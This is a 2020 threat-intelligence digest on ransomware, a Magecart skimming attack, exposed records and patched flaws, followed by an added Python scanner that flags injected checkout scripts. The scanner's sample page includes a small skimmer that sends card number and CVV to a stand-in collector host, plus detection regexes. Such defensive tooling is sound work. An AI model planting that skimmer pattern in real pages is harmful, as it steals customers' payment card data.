Cyware Daily Threat Intelligence, January 23, 2020


The game of ‘naming and shaming’ victims continues! The operators of Sodinokibi ransomware have now threatened to publish data stolen from the German automotive supplier GEDIA Automotive Group after the company did not respond to their ransom demand. The attackers are reported to have stolen more than 50GB of data, including drawings and records on employees and customers.

In a widespread scam campaign, over 2,000 WordPress sites have been hacked to redirect visitors to scam sites serving unwanted browser notification subscriptions, fake surveys, giveaways, and fake Adobe Flash downloads. The attackers compromised the sites by exploiting vulnerabilities in WordPress plugins and injecting malicious JavaScript into the pages.

The past 24 hours also saw a Magecart attack on sites belonging to a reseller of tickets for the Euro Cup and the Tokyo Summer Olympics. The skimmer was placed on the sites’ checkout pages to steal customers’ payment card details.

Top Breaches Reported in the Last 24 Hours

30,000 Cannabis users exposed
An unsecured Amazon S3 bucket belonging to THSuite exposed over 85,000 files, including more than 30,000 records containing PII. The incident affected three clients: Amedicanna Dispensary, Bloom Medicinals, and Colorado Grow Company. The exposed PII included names, home and email addresses, dates of birth, phone numbers, and medical ID numbers, among other data.

Magecart attack
Sites belonging to a reseller of tickets for the Euro Cup and the Tokyo Summer Olympics were infected with JavaScript that steals payment card details. The skimming code was injected into the checkout page of each site. On one of the websites, the code had survived for at least 50 days.

Top Malware Reported in the Last 24 Hours

Sodinokibi ransomware threatens
Operators of Sodinokibi ransomware are now threatening to publish data stolen from GEDIA Automotive Group after the company failed to comply with their ransom demand. During the attack, the ransomware encrypted all computers on the company's network.

PupyRAT
A hacking campaign using PupyRAT is suspected to have targeted the European energy sector to gather sensitive information. The malware runs on Windows, Linux, OS X, and Android and gives the attackers access to the victim's system, including usernames, passwords, and sensitive information across the network.

Top Vulnerabilities Reported in the Last 24 Hours

Vulnerable Apple Inc’s Safari
Google has uncovered multiple security flaws in Apple Inc’s Safari web browser that allowed the tracking of users’ browsing behavior. Apple has fixed the flaws since the disclosure.

Samba issues patches
Samba has released security updates for three flaws tracked as CVE-2019-14902, CVE-2019-14907, and CVE-2019-19344. The flaws can allow attackers to take control of systems.

Cisco patches Firepower Management Center
Cisco is urging customers to update their Firepower Management Center software after it found a critical bug that attackers could exploit over the internet. The bug has a severity rating of 9.8 out of 10. The vulnerability is caused by a flaw in the way Cisco's software handles Lightweight Directory Access Protocol (LDAP) authentication responses from an external authentication server.

Flawed MSP software
Eight vulnerabilities discovered in ConnectWise’s software for Managed Service Providers (MSPs) can allow attackers to silently execute code on any desktop managed by the application. One of these vulnerabilities is a Cross-Site Request Forgery (CSRF) flaw. An attack chain built from these vulnerabilities is believed to resemble the August attack on Texas local and state agencies.

Vulnerable AMD Radeon graphics cards patched
A total of four security vulnerabilities discovered in some AMD ATI Radeon graphics cards have been patched recently. Three of these flaws are out-of-bounds memory access issues and the fourth is a type confusion issue. The three out-of-bounds flaws are tracked as CVE-2019-5124, CVE-2019-5146, and CVE-2019-5147.

Honeywell’s MAXPRO flaws fixed
Some of Honeywell’s MAXPRO video surveillance systems are affected by serious vulnerabilities that can be exploited by attackers to take complete control of the system. The two flaws are CVE-2020-6959 and CVE-2020-6960. The vendor released patches for the vulnerabilities in September 2019.

Top Scams Reported in the Last 24 Hours

Scam campaign
Over 2,000 WordPress sites have been hacked to fuel a scam campaign that redirects visitors to scam sites containing unwanted browser notification subscriptions, fake surveys, giveaways, and fake Adobe Flash downloads. The campaign involves attackers exploiting vulnerabilities in well-known WordPress plugins such as ‘CP Contact Form with PayPal’ and ‘Simple Fields’. When exploited, the vulnerabilities allow the attackers to inject malicious JavaScript loaded from admarketlocation[.]com and gotosecond2[.]com.
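Both the Magecart skimmer and the WordPress redirect campaign above come down to an unexpected `<script>` on the page: either an external loader from a domain the site never used, or an inline snippet that reads payment fields and beacons them out. As an added example, not code from Cyware or from any of the researchers cited, the following Python scanner inventories a page's scripts and flags the two IOC domains named above, any external host outside an allowlist, and inline scripts that combine payment-field references with an exfiltration call. The sample checkout page, the allowlist, and the hosts cdn.stats.example and collector.invalid are constructed for the demonstration.

```python
"""Script-inventory audit for a checkout page: flags Magecart-style injections.

Added example; not code from the page or the campaigns it describes.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# IOC domains named in the WordPress campaign above (defanged form re-joined for matching).
KNOWN_BAD_DOMAINS = {"admarketlocation.com", "gotosecond2.com"}

# Inline-script heuristics typical of a card skimmer: it reads payment-form fields
# and ships them out through a request or an image beacon. Heuristic only;
# obfuscated skimmers need decoding before these patterns apply.
FIELD_RE = re.compile(r"card|cvv|cvc|expir|ccnum", re.I)
EXFIL_RE = re.compile(r"XMLHttpRequest|fetch\(|sendBeacon|new Image\(|\.src\s*=", re.I)


class ScriptCollector(HTMLParser):
    """Collects external script URLs and inline script bodies with their line numbers."""

    def __init__(self):
        super().__init__()
        self.external = []   # (src, line)
        self.inline = []     # (body, line)
        self._buf = None     # text chunks while inside an inline <script>...</script>
        self._line = 0

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        line = self.getpos()[0]
        if src:
            self.external.append((src, line))
        else:
            self._buf, self._line = [], line

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.inline.append(("".join(self._buf), self._line))
            self._buf = None


def host_of(src):
    """Host a script src loads from, or '' for same-origin/relative paths."""
    return (urlparse(src.strip()).hostname or "").lower()


def matches_domain(host, domains):
    """True if host equals one of domains or is a subdomain of one."""
    return any(host == d or host.endswith("." + d) for d in domains)


def audit_page(html, allowed_hosts):
    """Return findings as (kind, line, detail) tuples sorted by line."""
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for src, line in parser.external:
        host = host_of(src)
        if not host:
            continue  # relative path: first-party asset
        if matches_domain(host, KNOWN_BAD_DOMAINS):
            findings.append(("known_ioc", line, host))
        elif not matches_domain(host, allowed_hosts):
            findings.append(("unlisted_host", line, host))
    for body, line in parser.inline:
        if FIELD_RE.search(body) and EXFIL_RE.search(body):
            findings.append(("inline_skimmer_pattern", line, body.strip()[:60]))
    return sorted(findings, key=lambda f: f[1])


# Constructed sample: a checkout page carrying one unlisted CDN, one inline skimmer,
# and one loader from an IOC domain. collector.invalid / cdn.stats.example are made up.
SAMPLE_CHECKOUT = """<html><head>
<script src="/assets/checkout.js"></script>
<script src="https://code.jquery.com/jquery-3.4.1.min.js"></script>
<script src="https://cdn.stats.example/track.js"></script>
</head><body>
<form id="payment"><input name="cardnumber"><input name="cvv"></form>
<script>
  document.getElementById('payment').addEventListener('submit', function () {
    var d = btoa(document.forms[0].cardnumber.value + '|' + document.forms[0].cvv.value);
    new Image().src = 'https://collector.invalid/p?d=' + d;
  });
</script>
<script src="//gotosecond2.com/lib.js"></script>
</body></html>"""

SAMPLE_ALLOWLIST = {"code.jquery.com"}  # assumed per-site baseline of legitimate script hosts

if __name__ == "__main__":
    for kind, line, detail in audit_page(SAMPLE_CHECKOUT, SAMPLE_ALLOWLIST):
        print(f"line {line}: {kind}: {detail}")
```

Run this against fetched checkout pages on a schedule and diff the script inventory between runs; the 50-day dwell time on the ticket reseller's site is exactly what a baseline of expected script hosts would have cut short. The allowlist is the weak point (a compromised legitimate CDN passes), so pair the scan with a Content-Security-Policy and Subresource Integrity on the scripts the allowlist does permit.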

Tags

cisco firepower management center
sodinokibi ransomware
pupyrat
amd radeon

Posted on: January 23, 2020
